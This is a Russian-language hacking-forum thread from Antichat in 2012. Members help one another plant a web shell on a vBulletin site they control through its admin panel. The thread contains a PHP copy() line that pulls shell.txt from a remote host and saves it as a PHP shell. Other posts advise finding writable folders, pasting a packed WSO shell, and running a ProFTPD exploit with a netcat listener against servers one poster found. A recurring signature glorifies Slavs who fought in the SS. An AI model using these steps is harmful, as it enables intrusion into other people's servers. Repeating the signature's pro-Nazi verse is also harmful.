ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.02.2012, 20:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от faza02
faza02 said:
хорошо, спасибо.
а какие еще функции есть, которые не выключены, и через которые можно залить?
так ты что на данный момент имеешь?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
07.02.2012, 20:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от None
disable_functions dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, chown, chgrp
allow_url_fopen On
вот, залить могу что угодно
|
|
|
|
07.02.2012, 20:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от faza02
faza02 said:
вот, залить могу что угодно
я к тому что откуда ты эту инфу берешь, у тебя евал там?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
07.02.2012, 20:52
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
админка вб, выполнение пхп кода через модули
|
|
|
|
07.02.2012, 20:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
ну так заливай, в чем проблема, я тебя понять не могу...
если ты о том как заливать, то один из вариантов
copy('http://site.ru/shell.txt','/papka/s/npoBaMu/Ha/3anucb/6e3naleBashell.php');
если ты о том что за папка с правами на запись, то найди в пхпхинфо DOCUMENT_ROOT там будет путь к site.ru если у тебя форум в папке site.ru/forum/ то припишешь к этому пути /forum/ ну а там уже сам думай в какую папку лить, ищи которая на запись доступна
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
07.02.2012, 21:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Лучше сразу код пакованного WSO вставь. Дальше спокойно посмотришь, где доступно для записи, где нет и зальеш в уютное местечко =)
|
|
|
|
07.02.2012, 21:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
2110
Репутация:
0
|
|
Сообщение от james00x
james00x said:
Привет, нашел в сервер
220 ProFTPD 1.3.2e Server (ProFTPD)
Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/
У меня ест ТП-Линк - я там поставил виртуал сервер
ID Service Ports IP Address Protocol Status
1 45295 192.168.1.100 ALL Enabled
чтобы работала порт, тогда с netcat открыл тот порт через cmd.
C:\nc>nc -lvp 45295
listening on [any] 45295 ...
ладно тогда открываю новы cmd и запускаю перл ехплоит.
Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.
Если все сделал правильно тогда проста там все ок?
Я делаю все правильно? Потому что я нашел еще 2 сервера. Другие версии других операционных систем, но ничего не меняется. Но exploit показано, что ходить в их версии.
Заранее спасибо.
|
|
|
|
08.02.2012, 00:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
ребят, подскажите где можна почитать про уязвимость в поле search?
|
|
|
|
08.02.2012, 01:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от pirat0
pirat0 said:
ребят, подскажите где можна почитать про уязвимость в поле search?
поле 'search' ничем не отличается от 'уязвимости' id. Это просто мегап****ц вопрос. Никогда в этой теме так никому не говорил, но тут порвало шаблон. НАПИШИ КАКОЕ-НИТЬ подобие сайта из двух страниц и базы, чтобы не задавать таких вопросов.
|
|
|
|
08.02.2012, 01:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pirat0
pirat0 said:
ребят, подскажите где можна почитать про уязвимость в поле search?
разве это новая категория уязвимостей?
чаще всего там бывает xss или sqli, sqli из за недостаточной фильтрации входящих данных, которые используются вместе с оператором LIKE
Melfis +1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
